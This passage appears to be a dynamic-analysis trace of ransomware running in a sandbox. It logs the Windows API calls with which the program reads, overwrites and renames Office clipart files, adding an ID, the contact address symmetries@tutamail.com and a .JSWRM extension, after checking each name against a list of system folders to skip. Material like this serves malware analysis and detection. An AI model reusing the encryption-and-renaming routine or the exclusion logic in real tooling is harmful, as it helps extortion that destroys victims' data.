hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5b0) returned 0x2332c0 [0078.921] ReadFile (in: hFile=0x314, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x5b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x5b0, lpOverlapped=0x0) returned 1 [0078.924] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.924] WriteFile (in: hFile=0x314, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x5b0, lpOverlapped=0x0) returned 1 [0078.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2332c0 | out: hHeap=0x1e0000) returned 1 [0078.924] CloseHandle (hObject=0x314) returned 1 [0078.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0078.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0078.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0078.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0078.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0078.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0078.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0078.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0078.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0078.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0078.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0078.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0078.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0078.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0078.924] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00601_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00601_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00601_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00601_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0078.925] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0078.925] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0078.925] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0078.925] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf50660, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf50660, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf76988, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x578, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH00602_.WMF", cAlternateFileName="")) returned 1 [0078.925] lstrcmpiW (lpString1="HH00602_.WMF", lpString2=".") returned 1 [0078.925] lstrcmpiW (lpString1="HH00602_.WMF", lpString2="..") returned 1 [0078.925] lstrcmpiW (lpString1="HH00602_.WMF", lpString2="...") returned 1 [0078.925] lstrcmpiW (lpString1="HH00602_.WMF", lpString2="windows") returned -1 [0078.925] lstrcmpiW (lpString1="HH00602_.WMF", lpString2="recovery") returned -1 [0078.925] lstrcmpiW (lpString1="HH00602_.WMF", lpString2="perflogs") returned -1 [0078.925] lstrcmpiW (lpString1="HH00602_.WMF", lpString2="documents and settings") returned 1 [0078.925] lstrcmpiW (lpString1="HH00602_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0078.925] lstrcmpiW (lpString1="HH00602_.WMF", lpString2="system volume information") returned -1 [0078.926] lstrcmpiW (lpString1="HH00602_.WMF", lpString2="msocache") returned -1 [0078.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0078.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00602_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00602_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00602_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0078.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0078.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00602_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00602_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00602_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0078.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0078.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0078.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0078.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0078.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0078.926] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00602_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00602_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0078.926] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1400) returned 1 [0078.926] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x570) returned 0x2332c0 [0078.926] ReadFile (in: hFile=0x314, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x570, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x570, lpOverlapped=0x0) returned 1 [0078.928] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.928] WriteFile (in: hFile=0x314, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x570, lpOverlapped=0x0) returned 1 [0078.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2332c0 | out: hHeap=0x1e0000) returned 1 [0078.928] CloseHandle (hObject=0x314) returned 1 [0078.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0078.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0078.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0078.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0078.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0078.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0078.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0078.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0078.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0078.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0078.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0078.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0078.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0078.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0078.928] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00602_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00602_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00602_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00602_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0078.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0078.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0078.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0078.929] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf9cafe, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf9cafe, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf9cafe, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3158, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH00612_.WMF", cAlternateFileName="")) returned 1 [0078.929] lstrcmpiW (lpString1="HH00612_.WMF", lpString2=".") returned 1 [0078.929] lstrcmpiW (lpString1="HH00612_.WMF", lpString2="..") returned 1 [0078.929] lstrcmpiW (lpString1="HH00612_.WMF", lpString2="...") returned 1 [0078.929] lstrcmpiW (lpString1="HH00612_.WMF", lpString2="windows") returned -1 [0078.929] lstrcmpiW (lpString1="HH00612_.WMF", lpString2="recovery") returned -1 [0078.930] lstrcmpiW (lpString1="HH00612_.WMF", lpString2="perflogs") returned -1 [0078.930] lstrcmpiW (lpString1="HH00612_.WMF", lpString2="documents and settings") returned 1 [0078.930] lstrcmpiW (lpString1="HH00612_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0078.930] lstrcmpiW (lpString1="HH00612_.WMF", lpString2="system volume information") returned -1 [0078.930] lstrcmpiW (lpString1="HH00612_.WMF", lpString2="msocache") returned -1 [0078.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0078.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00612_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00612_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00612_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0078.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0078.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00612_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00612_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00612_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0078.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0078.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0078.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0078.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0078.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0078.930] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00612_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00612_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0078.931] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12632) returned 1 [0078.931] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3150) returned 0x24d210 [0078.931] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3150, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3150, lpOverlapped=0x0) returned 1 [0078.933] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.933] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3150, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3150, lpOverlapped=0x0) returned 1 [0078.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0078.933] CloseHandle (hObject=0x314) returned 1 [0078.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0078.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0078.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0078.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0078.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0078.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0078.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0078.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0078.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0078.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0078.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0078.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0078.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0078.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0078.934] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00612_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00612_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00612_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00612_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0078.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0078.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0078.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0078.934] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf76988, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf76988, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf9cafe, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2994, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH00623_.WMF", cAlternateFileName="")) returned 1 [0078.935] lstrcmpiW (lpString1="HH00623_.WMF", lpString2=".") returned 1 [0078.935] lstrcmpiW (lpString1="HH00623_.WMF", lpString2="..") returned 1 [0078.935] lstrcmpiW (lpString1="HH00623_.WMF", lpString2="...") returned 1 [0078.935] lstrcmpiW (lpString1="HH00623_.WMF", lpString2="windows") returned -1 [0078.935] lstrcmpiW (lpString1="HH00623_.WMF", lpString2="recovery") returned -1 [0078.935] lstrcmpiW (lpString1="HH00623_.WMF", lpString2="perflogs") returned -1 [0078.935] lstrcmpiW (lpString1="HH00623_.WMF", lpString2="documents and settings") returned 1 [0078.935] lstrcmpiW (lpString1="HH00623_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0078.935] lstrcmpiW (lpString1="HH00623_.WMF", lpString2="system volume information") returned -1 [0078.935] lstrcmpiW (lpString1="HH00623_.WMF", lpString2="msocache") returned -1 [0078.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0078.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00623_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00623_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00623_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0078.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0078.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00623_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00623_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00623_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0078.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0078.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0078.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0078.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0078.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0078.935] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00623_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00623_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0078.935] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10644) returned 1 [0078.936] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2990) returned 0x24d210 [0078.936] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2990, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2990, lpOverlapped=0x0) returned 1 [0078.987] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.987] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2990, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2990, lpOverlapped=0x0) returned 1 [0078.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0078.987] CloseHandle (hObject=0x314) returned 1 [0078.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0078.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0078.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0078.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0078.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0078.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0078.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0078.988] RtlAllocateHeap 